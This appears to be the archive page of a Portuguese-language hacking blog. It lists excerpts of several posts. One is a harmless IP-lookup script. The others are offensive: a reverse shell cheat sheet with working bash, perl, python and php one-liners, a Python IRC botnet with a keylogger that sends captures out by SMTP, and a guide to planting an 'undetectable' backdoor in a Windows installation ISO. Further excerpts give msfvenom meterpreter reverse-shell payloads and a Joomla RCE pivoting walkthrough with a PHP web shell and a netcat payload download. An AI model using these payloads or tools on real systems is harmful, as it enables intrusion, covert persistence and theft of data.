Pular para o conteúdo principal

Postagens

Mostrando postagens de janeiro, 2016

Script Python what is my ip address

USE: $ python myip.py <------------- Copy here -------------> #!/usr/bin/python # -*- coding: utf-8 -*- def IP():     from urllib2 import urlopen     from re import findall     lists = [     "http://www.get-ip.me/",     "http://checkip.dyndns.org/",     "http://whatsmyip.net/",     "http://mxtoolbox.com/WhatIsMyIP/",     ]     for x in lists:         try:             data = urlopen(x, timeout=2).read()             grab = findall('([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', data)             ip = grab[0]             break         except:             pass...

Reverse Shell Cheat Sheet

BASH $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 PERL $ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Aqui está, uma versão mais curta: http://adf.ly/1W857R PYTHON Este foi testado em  Linux / Python 2.7: $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP $ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Se você quiser um arquivo .php para upload, ver o mais robusto e cheio de recursos: http://adf.ly/1W85oD RUB...

[DEMOSTRAÇÃO] Botnet IRC em Python

VIRUS SCAN http://viruscheckmate.com/free/#/task... Bom pessoal algum tempo atraz eu resovie criar um botnet irc em python entao saiu isso ai, claro nao esta completo tenho que corrigir alguns erros e adicionar novos comando essa botnet cosiste em: tratamento de exceções autenticao por senha informacao de ip informacao de sistema informacao de bot informacao de diretorio atual (exemplo o pwd do linux que mostra em qual é o diretorio atual o usuario ta) navegacao de diretorio (assim como no linux e no windows usando o comando cd) download de arquivos para o pc infectado upload de arquivo do pc infectado execucoes(run) de arquivos no pc infectado lista arquivos do diretorio atual no pc infectado ocutar arquivos do pc infectado (esqueci de mostrar) Captura de teclas (keylogger Via smtp)

Create ISO Windows with Backdoor Undetectable

Olá Leitores Nesse post mostro como podemos criar uma imagem iso do windows 32bit inserindo o backdoor usando conexão reversar dns com o Msfconsole (Mais - http://mstutoriall.blogspot.com.br/2016/01/fud-98-msfconsole-exploit-startup-with.html ) Passo 1 Baixe uma imagem iso de fonte confiaveis ou compre um dvd original(sem virus kkkk) Passo 2 Com a imagem ISO em mãos, Abra sua VM e faça um instalação limpa. como no video Passo 3 Crie um novo disco no tamanho de 10GB, para receber um arquivo (Install.wim) Renomei as partições para: windows 7 e Backup Local Disk C: ou Disco Local C: = é a primeira intalação onde comtem todo o windows instalado Backup é a segunda partição para receber o arquivo install,wim Passo 4 Para facilitar nossa vida instale os drivers em Insert Guest Additions CD image, adicionais para convidados. Veja mais aqui ( https://www.youtube.com/watch?v=Sr38pBxqlII ) Isso nos permite fazer compartilhamento entre a Maquina virtual e o Hospedeiro(seu pc é clar...

[FUD 98%] Msfconsole - Exploit Startup with Windows - Shellcode Python

Olá Leitores Nesse post irei aborda como podemos manter acesso a um computador usando o msfconsole, para isso usarei um conexão reverso dns com o noip. Criando Payload # msfvenon -p windows/meterpreter/reverse_tcp_dns LHOST=YOUR.NO-IP.ORG LPORT=YOUR_PORT -f exe > OUTPUT_DNS.exe Criando Script python Donwload: http://adf.ly/1Y5NlJ Gerando shellcode # msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=YOUR.NO-IP.ORG LPORT=YOUR_PORT -b '\x00\x0a\x0d\x40' -f c Copilar para .py para .exe Donwload: Pacote-Compile: http://adf.ly/1XkLC2 - Video: http://adf.ly/1TNfdt build-exe: http://adf.ly/1Y59vK Video:

Pivoting PART 2: Advanced: Penetration Testing + Reverse SSH Tunnel + RDP

Exemplo de conseguir um shell em um servidor vulneravel Exploiting CVE-2015-8562 (A New Joomla! RCE) http://resources.infosecinstitute.com/exploiting-cve-2015-8562-new-joomla-rce-2/ Criando uma exploit com o msfvenom $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP_EXTERNO LPORT=7000 -f elf > linuxexploit Enviando o exploit com o netcat $ nc -lvp 7000 < linuxexploit Recebendo o exploit no servidor com um shell php Navegador: http://servidor.vuneravel.com/shell.php?cmd=nc SEU_IP_EXTERNO 8000 > exploit source da shell.php : < ?php system($_GET['cmd']); ?> Local Root Exploit Ubuntu 12.04.5 LTS Link: https://www.exploit-db.com/exploits/37292/ Upando exploitroot.c para o servidor com o meterpreter meterpreter> upload exploitroot.c Obs: o exploitroot.c esta na pasta home, se você tiver colocado em outro diretoria digite o caminho completo Compilando e executando o exploitroot no servidor use shell $ gcc exploitroot.c -o exploitroot...

Pivoting - Penetration Testing - KaliLinux

Visão geral Pivoting refere-se à prática de cortar um computador em rede ou um servidor e, em seguida, usando esse host para atacar outros sistemas de computador dentro da rede. Ao lançar ataques de dentro da rede, o atacante ignora política de firewall e pode executar ataques que não seriam possíveis de fora da rede. Ao utilizar um sistema comprometido para lançar ataques a partir de, o atacante tem uma melhor perspectiva de permanecer despercebido e pode deixar menos de uma impressão digital. Ferramentas msfconsole -: https://www.offensive-security.com/metasploit-unleashed/msfconsole/ msfvenom -: https://www.offensive-security.com/metasploit-unleashed/msfvenom/ netcat -: https://nmap.org/ncat/ curl -: http://curl.haxx.se/ socks4a -: https://www.rapid7.com/db/modules/auxiliary/server/socks4a proxychains -: https://github.com/rofl0r/proxychains-ng nmap -: https://nmap.org/ seattlelab_pass -: https://www.rapid7.com/db/modules/exploit/windows/pop3/seattlelab_pass wce...